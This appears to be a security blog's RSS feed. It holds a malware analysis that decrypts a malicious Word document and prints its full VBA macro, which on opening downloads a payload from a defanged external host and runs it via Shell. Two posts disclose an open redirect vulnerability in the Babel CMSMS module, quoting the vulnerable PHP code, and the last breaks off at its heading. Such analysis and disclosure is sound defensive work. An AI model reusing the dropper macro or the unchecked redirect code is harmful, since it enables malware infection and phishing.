&lt;p&gt;When analyzing a Word document of the &amp;ldquo;old DOC&amp;rdquo; variety (&lt;a href=&#34;https://www.forensicswiki.org/wiki/Word_Document_%28DOC%29&#34;&gt;OLE Binary Compound File&lt;/a&gt;), OLEdump should give us an output showing a file structure at least somewhat similar to the following examples. First file is a normal document, second file is a password-protected document and the third is a password-protected document containing macros.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/maldoc/oledump_output_2.png&#34; alt=&#34;OLEdump outputs&#34; /&gt;&lt;/p&gt;
&lt;p&gt;What we have here is actually a &amp;ldquo;new type&amp;rdquo; Word file with enabled encryption (since in cases when encryption is enabled on a DOCX file, it is saved as an OLE compound file) and modified extension. Attackers quite often change extensions of DOCM files to DOC, since Word will open (and correctly interpret) a DOCX/DOCM document with a DOC extension and most users seem to be less affraid to open a DOC than a DOCM, which obviously contains macros.&lt;/p&gt;
&lt;p&gt;Although OLEdump is a fairly versatile tool, it can&amp;rsquo;t natively handle decryption of DOCX files, even though they are in the OLE CF format. It can, however, tell us what kind of encryption is used to secure the contents of the file (as there are several possibilities - if you&amp;rsquo;d like to know more, you may refer to the relevant &lt;a href=&#34;https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-offcrypto/&#34;&gt;Microsoft documentation&lt;/a&gt;) which will help us to choose the best tool for decryption. As Didier Stevens - author of DSS - &lt;a href=&#34;https://blog.didierstevens.com/2018/06/07/encrypted-ooxml-documents/&#34;&gt;mentions on his own blog&lt;/a&gt;, there is a plugin called &amp;ldquo;plugin_office_crypto&amp;rdquo; which can help us with determining the encryption used. With its help (using the option -p), we can see that in this case Agile Encryption is employed.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/maldoc/oledump_plugin_output.png&#34; alt=&#34;OLEdump plugin output&#34; /&gt;&lt;/p&gt;
&lt;p&gt;One of the first results Google returns (at the time of writing), if you ask it how to decrypt Agile Encryption, is a link to a GitHub page for &lt;a href=&#34;https://github.com/nolze/msoffcrypto-tool&#34;&gt;msoffcrypto-tool&lt;/a&gt;, a &amp;ldquo;Python tool and library for decrypting MS Office files with passwords or other keys&amp;rdquo;. As it is also a tool I can recommend, since it&amp;rsquo;s helped me couple of times in the past, it will be the one we use for decrypting our malicious document.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2019/maldoc/decrypted_output.png&#34; alt=&#34;Decrypted output&#34; /&gt;&lt;/p&gt;
&lt;p&gt;As we can see, the decryption was successful. If we use TrID or a similar tool, we will learn that our document is indeed a DOCM file. Although modern Word documents are basically ZIP files containing XMLs, any macros they contain are still saved in OLE CF format, which means we can still use OLEdump to analyze our file. All we need to do is have a look at the macros in A3 to A6 and OLEdump option -v will help us with that. You may find the entire source code bellow and as it is not obfuscated in any way, I don&amp;rsquo;t believe it requires much in the way of an explanation. Perhaps the only thing to add is that details for the word88.foc file - which the macro tries to download - may be found &lt;a href=&#34;https://www.virustotal.com/#/file/ab3cac7d9c1cb2d78e1be8c4749cbc7332fdc926ea85a92000e2c7f52fab51b5/detection&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id=&#34;a6-vbathisdocument&#34;&gt;A6: VBA/ThisDocument&lt;/h4&gt;
&lt;div style=&#34;background: #ffffff; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;&#34;&gt;&lt;pre style=&#34;margin: 0; line-height: 125%&#34;&gt;&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Private&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;Document_Open&lt;/span&gt;()
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Dim&lt;/span&gt; var1 &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Integer&lt;/span&gt;
    var1 &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;1234&lt;/span&gt;
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt; var1 &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;1234&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Then&lt;/span&gt;
        noutil
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;h4 id=&#34;a3-vbamodule1&#34;&gt;A3: VBA/Module1&lt;/h4&gt;
&lt;div style=&#34;background: #ffffff; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;&#34;&gt;&lt;pre style=&#34;margin: 0; line-height: 125%&#34;&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;noutil&lt;/span&gt;()
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Dim&lt;/span&gt; url &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Variant&lt;/span&gt;
    url &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; Array(getUrl)
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Dim&lt;/span&gt; savePath &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;
    savePath &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; Environ(&amp;quot;temp&amp;quot;&lt;/span&gt;) &lt;span style=&#34;color: #FFFFFF&#34;&gt;&amp;amp;&lt;/span&gt; &amp;quot;\tryui.&amp;quot;&lt;/span&gt; &lt;span style=&#34;color: #FFFFFF&#34;&gt;&amp;amp;&lt;/span&gt; &amp;quot;jmp&amp;quot;&lt;/span&gt;
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt; IsArray(url) &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;True&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Then&lt;/span&gt;
        SaveFile url(&lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;0&lt;/span&gt;), savePath, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;False&lt;/span&gt;, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;True&lt;/span&gt;
        runNagr savePath
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;h4 id=&#34;a4-vbamodule2&#34;&gt;A4: VBA/Module2&lt;/h4&gt;
&lt;div style=&#34;background: #ffffff; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;&#34;&gt;&lt;pre style=&#34;margin: 0; line-height: 125%&#34;&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Function&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;getUrl&lt;/span&gt;() &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt; IsArray(var) &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;False&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Then&lt;/span&gt;
        getUrl &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &amp;quot;hxxp://infogiceleredalog.info/word88.foc&amp;quot;&lt;/span&gt;
    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Function&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;h4 id=&#34;a5-vbamodule3&#34;&gt;A5: VBA/Module3&lt;/h4&gt;
&lt;div style=&#34;background: #ffffff; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;&#34;&gt;&lt;pre style=&#34;margin: 0; line-height: 125%&#34;&gt;
&lt;span style=&#34;color: #557799&#34;&gt;#If VBA7 Then&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Private&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Declare&lt;/span&gt; PtrSafe &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Function&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;URLDownloadToFile&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Lib&lt;/span&gt; &amp;quot;urlmon&amp;quot;&lt;/span&gt; _
        &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Alias&lt;/span&gt; &amp;quot;URLDownloadToFileA&amp;quot;&lt;/span&gt; (&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; pCaller &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;, _
                                    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; szURL &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; szFileName &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;, _
                                    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; dwReserved &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; lpfnCB &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;) &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;
#&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Else&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Private&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Declare&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Function&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;URLDownloadToFile&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Lib&lt;/span&gt; &amp;quot;urlmon&amp;quot;&lt;/span&gt; _
        &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Alias&lt;/span&gt; &amp;quot;URLDownloadToFileA&amp;quot;&lt;/span&gt; (&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; pCaller &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;, _
                                    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; szURL &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; szFileName &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;, _
                                    &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; dwReserved &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;, &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;ByVal&lt;/span&gt; lpfnCB &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;) &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;Long&lt;/span&gt;
&lt;span style=&#34;color: #557799&#34;&gt;#End If&lt;/span&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;runNagr&lt;/span&gt;(var1 &lt;span style=&#34;color: #000000; font-weight: bold&#34;&gt;As&lt;/span&gt; &lt;span style=&#34;color: #333399; font-weight: bold&#34;&gt;String&lt;/span&gt;)
    Shell var1
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt;
&lt;p&gt;&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Public&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt; &lt;span style=&#34;color: #0066BB; font-weight: bold&#34;&gt;SaveFile&lt;/span&gt;(Param1, Param2, Param3, Param4)&lt;br /&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt; Param4 &lt;span style=&#34;color: #FFFFFF&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;True&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Then&lt;/span&gt;&lt;br /&gt;
URLDownloadToFile &lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;0&lt;/span&gt;, Param1, Param2, &lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;0&lt;/span&gt;, &lt;span style=&#34;color: #0000DD; font-weight: bold&#34;&gt;0&lt;/span&gt;&lt;br /&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;If&lt;/span&gt;&lt;br /&gt;
&lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;End&lt;/span&gt; &lt;span style=&#34;color: #008800; font-weight: bold&#34;&gt;Sub&lt;/span&gt;&lt;br /&gt;
&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware Analysis</category>
            
          
        
        
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>How big of a problem is the &#39;open redirect&#39; in Babel?</title>
        <link>https://untrustednetwork.net/en/2019/03/02/how-big-of-a-problem-is-the-open-redirect-in-babel/</link>
        <pubDate>Sat, 02 Mar 2019 12:35:00 +0100</pubDate>
        
        <atom:modified>Sat, 02 Mar 2019 12:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/03/02/how-big-of-a-problem-is-the-open-redirect-in-babel/</guid>
        <description>During a recent research into prevalence of open redirection vulnerabilities within the ccTLD .CZ we&amp;rsquo;ve done with my colleagues from ALEF CSIRT (description of its results in Czech may be foud here), I’ve noticed that many of the vulnerable sites seemed to be using CMS Made Simple with Babel multi-language module. This seemed to warrant a closer investigation&amp;hellip;
Before we go further, let’s briefly describe what „open redirection“ (CWE-601) weakness/vulnerability actually is.</description>
        <content:encoded>&lt;p&gt;During a recent research into prevalence of open redirection vulnerabilities within the ccTLD .CZ we&amp;rsquo;ve done with my colleagues from ALEF CSIRT (description of its results in Czech may be foud &lt;a href=&#34;https://www.root.cz/clanky/jak-velky-problem-jsou-open-redirection-zranitelnosti-nejen-na-ceskem-webu/&#34;&gt;here&lt;/a&gt;), I’ve noticed that many of the vulnerable sites seemed to be using CMS Made Simple with Babel multi-language module. This seemed to warrant a closer investigation&amp;hellip;&lt;/p&gt;
&lt;p&gt;Before we go further, let’s briefly describe what „open redirection“ (CWE-601) weakness/vulnerability actually is. The term is usually used to describe a mechanism which – when present on a certain website and queried in a specific way (usually by passing a specific parameter to it) - automatically redirects visiting browser to a different (arbitrary) domain/URL. What this means in practical terms is that it is possible to create a link to the website in question, which redirects user to any other - pontentially malicious or untrusted - site.&lt;br /&gt;
This behaviour might be intentionally present on certain websites, but in most cases, it is considered a vulnerability and/or bad practice since may be quite easily misused. Imagine, for example, how easy it would be to create a successful phishing campaign targeting clients of a bank which has open redirection vulnerability on its website.&lt;/p&gt;
&lt;p&gt;An example of a site with intentional open redirection functionality, which will enable us to demonstrate the principle in practice, is 1gr.cz – a logger which counts clickthroughs for ad and marketing purposes. A link to 1gr.cz which automatically redirects visitors to untrustednetwork.net could be crafted in the following way:&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tp://1g&lt;/span&gt;r.cz/log/redir.aspx?url=ht&lt;span&gt;tps://www.u&lt;/span&gt;ntrustednetwork.net/&lt;/kbd&gt;&lt;/p&gt;
&lt;p&gt;Now, let us dive right into the interesting details regarding CMS Made Simple and Bable.&lt;br /&gt;
CMS Made Simple (CMSMS) is one of the lesser known CMS platforms out there.  Although it is not too widely used, vulnerabilities in the CMSMS core or in its plugins or modules may still affect thousands of websites. This appears to be the case with the vulnerability I found in Babel – a module which brings multilingual functionality to CMSMS sites.&lt;br /&gt;
The full write up of the vulnerability may be found &lt;a href=&#34;https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/&#34;&gt;here&lt;/a&gt;, but in simple terms, Babel in all its versions translates content by redirecting user to different pages based on their language preferences. This is not a bad idea per se, however in Babel, the same mechanism enables anyone to create a link to the CMSMS-enabled site, which redirects to an arbitrary URL.&lt;br /&gt;
Babel – when installed – uses the path domain.root/modules/babel to hold all its PHP files. Among these is redirect.php, a file containing PHP script through which the translation is handled. The relevant code looks like this:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;6
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-js&#34; data-lang=&#34;js&#34;&gt;&lt;span class=&#34;k&#34;&gt;if&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;!&lt;/span&gt;&lt;span class=&#34;nx&#34;&gt;isset&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;nx&#34;&gt;$_GET&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;newurl&amp;#34;&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;])&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;){&lt;/span&gt;
	&lt;span class=&#34;cm&#34;&gt;/*code not important for our purposes removed here*/&lt;/span&gt;
&lt;span class=&#34;p&#34;&gt;}&lt;/span&gt;&lt;span class=&#34;k&#34;&gt;else&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;{&lt;/span&gt;
	&lt;span class=&#34;cm&#34;&gt;/*code not important for our purposes removed here*/&lt;/span&gt;
	&lt;span class=&#34;nx&#34;&gt;header&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;location: &amp;#34;&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;nx&#34;&gt;$_GET&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;newurl&amp;#34;&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]);&lt;/span&gt;
&lt;span class=&#34;p&#34;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;What it basically means is that if the &amp;ldquo;newurl&amp;rdquo; parameter is set, browser will be redirected to the URL contained therein. Since there are no checks or limits regarding the target URL, the fact that there is an &amp;ldquo;open&amp;rdquo; redirection vulnerability should be obvious.&lt;/p&gt;
&lt;p&gt;So how big of a problem is this vulnerability? Well, not too big. As has been said before, open redirection is mainly useful for phishing and not that many sites interesting to phishers use the Babel module&amp;hellip; But with approximately 3.700 URLs affected before the disclosure was published it is not insignificant either. That number is based on relevant Google search results (so take it with a grain of salt - in terms of affected sites, it was probably a lot less&amp;hellip;although the latest version of the vulnerable module was downloaded from the CMS website more than 5.700 times, so who knows) from February 14th 2019.&lt;/p&gt;
&lt;p&gt;I was interested in the distribution of vulnerable sites/URLs around different TLDs, so I&amp;rsquo;ve done a search for each of the 20 most used TLDs and a serach for each of the ccTLDs of European countries. The &amp;ldquo;Top 10&amp;rdquo; results are:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;TLD&lt;/th&gt;
&lt;th align=&#34;right&#34;&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;========&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;========&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;COM&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;1590&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BE&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;448&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FR&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;408&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NL&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;227&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PT&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;226&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CH&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;207&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DE&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;142&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CZ&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;96&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LV&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;78&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AT&lt;/td&gt;
&lt;td align=&#34;right&#34;&gt;46&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;p&gt;That covers most of what seems to be out there, but if you want to see the results for all top level domains with at least one relevant search result, they are summarized in the following chart.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/babel-tlds-chart.png&#34; alt=&#34;Vulnerable sites in different TLDs&#34; /&gt;&lt;/p&gt;
&lt;p&gt;As you may see, a number of the vulnerable websites are hosted on domains within ccTLDs belonging to different European countries. What&amp;rsquo;s more, based on a quick look at the .COM results, it seems that most of those domains are also registered by European citizens and companies. I&amp;rsquo;m not sure whether CMSMS as a whole or just Babel have mostly Euro-centric user base, but this regional disparity seemes quite interesting either way.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>ALEF</category>
            
          
            
              <category>Babel</category>
            
          
        
        
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>News</category>
            
          
            
              <category>2019</category>
            
          
        
        
      </item>
      
      <item>
        <title>Open Redirection Vulnerability in Babel</title>
        <link>https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/</link>
        <pubDate>Wed, 20 Feb 2019 20:36:35 +0100</pubDate>
        
        <atom:modified>Wed, 20 Feb 2019 20:36:35 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/</guid>
        <description>Bellow you may find description of a vulnerability I found in Babel - a CMSMS module - when searching for sites affected by Open Redirection vulnerabilities (writeup on the research in Czech may be found here). Further discussion of this vulnerability be found here.
Basic Information Affected Software: Babel: Multilingual Site module for CMS Made Simple
Affected Version: 0.4.1 and earlier
Patched Version: None - project is no longer under development</description>
        <content:encoded>&lt;p&gt;Bellow you may find description of a vulnerability I found in Babel - a CMSMS module - when searching for sites affected by Open Redirection vulnerabilities (writeup on the research in Czech may be found &lt;a href=&#34;https://www.root.cz/clanky/jak-velky-problem-jsou-open-redirection-zranitelnosti-nejen-na-ceskem-webu/&#34;&gt;here&lt;/a&gt;). Further discussion of this vulnerability be found &lt;a href=&#34;https://www.untrustednetwork.net/en/2019/03/02/how-big-of-a-problem-is-the-open-redirect-in-babel/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id=&#34;basic-information&#34;&gt;Basic Information&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Affected Software:&lt;/strong&gt; Babel: Multilingual Site module for CMS Made Simple&lt;br /&gt;
&lt;strong&gt;Affected Version:&lt;/strong&gt; 0.4.1 and earlier&lt;br /&gt;
&lt;strong&gt;Patched Version:&lt;/strong&gt; None - project is no longer under development&lt;br /&gt;
&lt;strong&gt;CVE Identifier:&lt;/strong&gt; &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010290&#34;&gt;CVE-2019-1010290&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;Vulnerability type:&lt;/strong&gt; CWE-601: URL Redirection to Untrusted Site (&amp;lsquo;Open Redirect&amp;rsquo;)&lt;br /&gt;
&lt;strong&gt;Severity Rating:&lt;/strong&gt; CVSS v3 Base Score: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)&lt;/p&gt;
&lt;h3 id=&#34;summary&#34;&gt;Summary&lt;/h3&gt;
&lt;p&gt;The Babel multi-language module for CMSMS contains an open redirection vulnerability in a script within the redirect.php file. The script takes an argument specifying a URL to which a browser should be redirected. This URL may be completely arbitrary. It is therefore possible to craft a link to a Babel-enabled site which causes redirection to any URL specified, even outside the originating domain. This is especially useful for phishing attacks, when attacker creates a link to a safe site, which, without the knowledge of a user, redirects him or her to a fake/malicious site. All CMSMS sites with Babel module installed are affected, since redirect.php is always publically accessible.&lt;/p&gt;
&lt;h3 id=&#34;detailed-description&#34;&gt;Detailed Description&lt;/h3&gt;
